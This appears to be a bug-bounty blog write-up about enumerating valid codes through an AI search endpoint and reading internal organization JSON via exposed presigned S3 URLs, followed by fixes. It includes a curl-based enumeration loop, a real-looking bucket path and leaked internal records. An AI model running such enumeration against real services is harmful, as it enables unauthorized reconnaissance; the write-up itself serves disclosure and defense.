How I Turned an AI Search Endpoint into an Internal Org Intel Leak

At first, it looked like nothing.

shxsu1

April 18, 2026

Just another endpoint:

/pine/aisearch?aicode=XXXXXX

Simple input. Simple output. Nothing interesting… until it was.

The Spark

I was testing it from a normal student account.

The behavior was straightforward:

Send an aicode
Get a response with hits.total

But then something stood out:

hits.total = 0 → invalid code
hits.total > 0 → valid code

That's when it clicked.

This wasn't just a search endpoint.

It was an oracle.
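To make the oracle concrete: the only thing a client needs from each response is whether hits.total is zero. A minimal sketch, assuming the body is JSON with a numeric hits.total (the sample bodies below are made up for illustration, not captured responses):

```python
import json

def code_exists(body: str) -> bool:
    """Return True when the search response reports at least one hit."""
    data = json.loads(body)
    # Assumed shape: {"hits": {"total": <int>}}; only hits.total comes from the write-up.
    return data["hits"]["total"] > 0

# Hypothetical response bodies, for illustration only.
print(code_exists('{"hits": {"total": 0}}'))  # False
print(code_exists('{"hits": {"total": 3}}'))  # True
```

One boolean per request is enough to tell valid codes from invalid ones, which is why the zero versus non-zero difference matters more than the contents of the results.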

Phase 1 — Turning It into an Enumeration Machine

The AI code format:

^\d{6}[\dA-Z]{6}$

The first 6 digits? That's the key.

Instead of brute-forcing the full keyspace (10⁶ × 36⁶ ≈ 2.2 × 10¹⁵ combinations), I only needed to scan 10⁶ prefixes.

That's not brute force anymore. That's feasibility.
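The arithmetic behind that claim follows directly from the regex: six positions with 10 options each, then six positions with 36 options each. A quick sketch; the request rate used for the time estimate is an assumption, since the write-up does not state real throughput:

```python
DIGITS = 10  # \d
ALNUM = 36   # [\dA-Z]: 10 digits + 26 uppercase letters

prefix_space = DIGITS ** 6
full_space = prefix_space * ALNUM ** 6

def scan_hours(candidates: int, requests_per_second: float) -> float:
    """Hours needed to try every candidate at a steady request rate."""
    return candidates / requests_per_second / 3600

print(f"prefixes:   {prefix_space:,}")  # 1,000,000
print(f"full codes: {full_space:,}")    # 2,176,782,336,000,000
# Assumed rate of 50 requests/second, chosen only to show the scale.
print(f"prefix scan at 50 req/s: {scan_hours(prefix_space, 50):.1f} hours")  # 5.6 hours
```

At the same assumed rate, the full keyspace would take well over a million years, so the prefix shortcut is what makes the scan practical.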

Quick script:

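# Walk every 6-digit prefix; [app] is the redacted host.
for i in {000000..999999}; do
  response=$(curl -s "https://[app]/pine/aisearch?aicode=${i}XXXXXX")
  # Any non-zero hits.total marks a valid prefix, not only totals that start with 1.
  if echo "$response" | grep -Eq '"total"[[:space:]]*:[[:space:]]*[1-9]'; then
    echo "[+] Valid prefix found: $i"
  fi
done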

And just like that… valid prefixes start revealing themselves.

Phase 2 — The Unexpected Door (S3)

While tracing the backend flow, something more interesting showed up.

The server was generating presigned AWS S3 URLs.

Example:

https://cb-cds-org-update-pine.s3.us-east-1.amazonaws.com/1008877/ais_1008877.json?X-Amz-...

What makes this worse?

No authentication required
No cookies
Accessible by anyone with the link
Valid for 1 full hour

If that URL leaks… it's done.
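The lifetime of a SigV4 presigned URL is readable from its own query string: X-Amz-Date holds the signing time and X-Amz-Expires the validity in seconds. A minimal sketch for auditing that window. The URL below is hypothetical (bucket, key, and parameter values are made up), not the truncated one from the report:

```python
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

def presigned_window(url: str) -> tuple[datetime, datetime]:
    """Return (signed_at, expires_at) for a SigV4 presigned URL."""
    query = parse_qs(urlsplit(url).query)
    signed_at = datetime.strptime(
        query["X-Amz-Date"][0], "%Y%m%dT%H%M%SZ"
    ).replace(tzinfo=timezone.utc)
    lifetime = timedelta(seconds=int(query["X-Amz-Expires"][0]))
    return signed_at, signed_at + lifetime

# Hypothetical URL, for illustration only.
example = (
    "https://example-bucket.s3.us-east-1.amazonaws.com/demo/file.json"
    "?X-Amz-Algorithm=AWS4-HMAC-SHA256"
    "&X-Amz-Date=20260101T120000Z"
    "&X-Amz-Expires=3600"
    "&X-Amz-SignedHeaders=host"
)
signed_at, expires_at = presigned_window(example)
print(expires_at - signed_at)  # 1:00:00
```

Inside that window the signature in the query string is the only credential, so anyone who obtains the link can fetch the object.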

Phase 3 — What's Inside?

Opening the JSON turned this from a minor bug into something else entirely.

{
  "orgId": "1008877",
  "aiCodes": [
    {
      "aiCd": "098522",
      "aiLevelCd": "2",
      "aiSourceCd": "CC",
      "aiStatusCd": "2",
      "apEligibilityInd": "Y",
      "psatEligibilityInd": "Y",
      "satEligibilityInd": "Y",
      "clepEligibilityInd": "Y",
      "annualReviewInd": "N",
      "initialIngestionPathCd": "1",
      "ssdEligibilityInd": "Y"
    }
  ]
}

This isn't just data.

This is:

Internal organization IDs
Valid AI codes
Program eligibility logic (AP / SAT / PSAT / CLEP / SSD)
Operational flags
System behavior hints

In other words… a blueprint.

Why This Matters (Even Without PII)

A common mistake is downplaying bugs like this because "there's no personal data."

That's missing the point.

1. Reduced Search Space

Instead of guessing blindly, you now have valid prefixes.

2. System Logic Exposure

You understand how eligibility decisions are structured.

3. Reconnaissance Advantage

Small leaks combine into a full system map.

4. Chaining Potential

This isn't the attack. This enables future attacks.

The Real Issue

The problem wasn't just S3. And it wasn't just the endpoint.

It was the combination:

An endpoint acting as an oracle
No rate limiting
Presigned URLs exposed to the client
Overly verbose JSON responses

That combination turned a simple feature… into a scalable vulnerability.

How I'd Fix It

Immediate

Add strict rate limiting (e.g., 10 requests/minute per user)
Invalidate existing presigned URLs by rotating the credentials that signed them (a presigned URL can't be revoked individually)
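The rate-limiting item could look something like the sliding-window limiter below. This is a sketch under assumptions: it keeps state in memory for a single process, and the class name and user ids are hypothetical. A real deployment would more likely sit at the gateway or use a shared store.

```python
import time
from collections import defaultdict, deque

class SlidingWindowLimiter:
    """Allow at most `limit` requests per `window` seconds for each user."""

    def __init__(self, limit: int = 10, window: float = 60.0, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.clock = clock
        self._hits = defaultdict(deque)  # user id -> timestamps of recent requests

    def allow(self, user_id: str) -> bool:
        now = self.clock()
        hits = self._hits[user_id]
        # Drop timestamps that have aged out of the window.
        while hits and now - hits[0] >= self.window:
            hits.popleft()
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True

limiter = SlidingWindowLimiter()
results = [limiter.allow("student-1") for _ in range(12)]
print(results.count(True), results.count(False))  # 10 2
```

At 10 requests per minute, walking all 10⁶ prefixes from one account would take 100,000 minutes, roughly 69 days, which leaves plenty of time for detection.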

Short-term

Stop exposing S3 URLs to clients
Proxy requests through the backend
Return only necessary fields
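For "return only necessary fields", one option is an allow-list applied by the backend before anything reaches the client. A minimal sketch; which fields a client really needs is an assumption here, and the function and constant names are hypothetical:

```python
import json

# Hypothetical allow-list: the fields a client needs are an assumption.
PUBLIC_AI_CODE_FIELDS = {"aiCd"}

def public_view(org_document: dict) -> dict:
    """Strip an internal org document down to allow-listed fields."""
    return {
        "aiCodes": [
            {k: v for k, v in entry.items() if k in PUBLIC_AI_CODE_FIELDS}
            for entry in org_document.get("aiCodes", [])
        ]
    }

# Trimmed copy of the leaked document shown earlier.
internal = {
    "orgId": "1008877",
    "aiCodes": [
        {"aiCd": "098522", "aiLevelCd": "2", "aiStatusCd": "2", "apEligibilityInd": "Y"}
    ],
}
print(json.dumps(public_view(internal)))  # {"aiCodes": [{"aiCd": "098522"}]}
```

An allow-list fails closed: a field added to the internal document later stays hidden until someone deliberately exposes it, which a deny-list does not guarantee.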

Medium-term

Sanitize S3 payloads
Remove internal metadata fields
Add logging and anomaly detection for enumeration patterns
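Enumeration has a recognizable shape in logs: one account requesting many distinct codes, most of which miss. A rough sketch of that heuristic, assuming search events are already logged as (user, code, hit) tuples; the thresholds and the synthetic log are illustrative, not tuned values:

```python
from collections import defaultdict

def flag_enumerators(events, min_distinct_codes=50, max_hit_ratio=0.1):
    """Return user ids whose search traffic looks like code enumeration.

    `events` is an iterable of (user_id, aicode, hit) tuples, where `hit`
    is True when the search returned at least one result.
    """
    codes = defaultdict(set)  # user id -> distinct codes requested
    hits = defaultdict(int)   # user id -> distinct codes that returned a hit
    for user_id, aicode, hit in events:
        if aicode not in codes[user_id]:
            codes[user_id].add(aicode)
            hits[user_id] += int(hit)
    flagged = []
    for user_id, seen in codes.items():
        if len(seen) >= min_distinct_codes and hits[user_id] / len(seen) <= max_hit_ratio:
            flagged.append(user_id)
    return flagged

# Synthetic log: user-a walks 200 sequential codes, user-b repeats one valid code.
scanner = [("user-a", f"{n:06d}", n % 40 == 0) for n in range(200)]
normal = [("user-b", "098522", True)] * 5
print(flag_enumerators(scanner + normal))  # ['user-a']
```

Counting distinct codes rather than raw requests keeps a user who retries the same valid code from being flagged.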

Final Thought

The most dangerous vulnerabilities aren't the ones that break systems.

They're the ones that teach you how the system works.

Because once the system starts explaining itself… you're no longer attacking it.

You're reading it.
